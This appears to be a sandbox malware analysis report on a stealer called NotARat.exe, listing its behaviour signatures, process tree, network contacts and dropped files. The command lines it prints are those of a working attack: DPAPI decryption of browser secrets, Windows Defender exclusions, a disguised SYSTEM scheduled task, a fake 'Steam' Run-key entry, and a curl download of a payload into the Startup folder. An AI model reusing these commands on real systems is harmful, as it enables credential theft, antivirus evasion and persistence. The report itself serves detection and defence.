Malware Analysis Report

2025-03-15 00:54

Sample ID 240626-pxr6yavdnd
Target NotARat.exe
SHA256 2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08
Tags
defense_evasion execution spyware stealer
score
8/10

Analysis Overview

score
8/10

SHA256

2bef68392f825f8100b9b43ba618339786681a830f8e7729c60199b77a0c1d08

Threat Level: Likely malicious

The file NotARat.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution spyware stealer

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Window

Looks up external IP address via web service

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Detects videocard installed

Enumerates processes with tasklist

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Analysis: static1

Detonation Overview

Reported

2024-06-26 12:43

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 12:42

Reported

2024-06-26 12:43

Platform

win10v2004-20240611-en

Max time kernel

5s

Max time network

10s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NotARat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3448 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 512 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4648 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4648 wrote to memory of 4684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4684 wrote to memory of 5000 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 5000 wrote to memory of 624 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 5000 wrote to memory of 624 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3448 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3596 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3596 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3448 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 948 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3448 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3160 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 2660 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2660 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3160 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3448 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3448 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\NotARat.exe C:\Windows\system32\cmd.exe
PID 3468 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NotARat.exe

"C:\Users\Admin\AppData\Local\Temp\NotARat.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp" "c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,42,82,230,175,100,47,24,121,244,38,217,77,134,94,156,21,93,118,76,169,73,67,148,94,19,158,84,26,52,226,35,237,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,223,57,68,165,139,175,21,194,10,220,128,158,89,208,99,19,222,138,51,26,163,91,19,34,194,203,13,123,9,0,3,186,48,0,0,0,198,120,45,52,168,82,21,129,226,214,224,149,134,250,60,27,74,221,39,187,147,205,244,73,156,1,1,218,54,18,45,155,159,228,180,137,208,250,82,200,165,92,102,164,194,214,225,77,64,0,0,0,145,14,212,182,95,66,45,242,222,249,66,252,109,108,103,126,252,50,253,152,3,149,161,109,106,148,207,64,23,253,167,70,41,48,47,233,236,254,214,245,208,198,38,75,161,42,134,37,154,108,19,207,58,239,164,34,36,132,34,175,159,77,3,21), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,214,81,225,118,57,32,187,77,148,157,112,156,147,7,151,106,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,149,227,135,141,185,10,243,132,225,189,78,199,56,20,80,35,204,150,79,77,195,99,168,104,55,117,76,27,166,153,245,129,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,34,173,107,158,119,24,253,75,255,201,72,205,196,238,50,172,142,162,222,103,187,83,211,217,199,4,106,115,192,144,61,48,0,0,0,20,78,41,31,201,247,122,235,230,242,235,47,154,205,1,228,95,113,45,133,228,179,107,169,176,104,224,80,71,158,151,43,240,232,209,23,148,156,147,155,137,208,186,153,173,77,22,10,64,0,0,0,158,218,165,191,81,83,175,76,135,164,112,141,200,119,160,206,250,82,124,150,107,118,178,224,98,3,224,130,45,128,125,200,197,143,12,208,5,116,120,98,19,104,153,152,0,82,243,166,198,170,4,89,138,187,114,41,255,136,31,190,48,160,90,33), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp" "c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\NotARat.exe" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
BE 88.221.83.203:443 www.bing.com tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 203.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 104.26.12.205:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.12.205:80 api.ipify.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

C:\Users\Admin\AppData\Local\Temp\temp.ps1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_psgny50s.boa.ps1

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\fazsyl15\CSCFCCCA6AD117F4F7FAA464D7591995D9E.TMP

C:\Users\Admin\AppData\Local\Temp\RES5F37.tmp

C:\Users\Admin\AppData\Local\Temp\fazsyl15\fazsyl15.dll

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\ProgramData\edge\Updater\RunBatHidden.vbs

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.0.cs

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP

C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp

C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
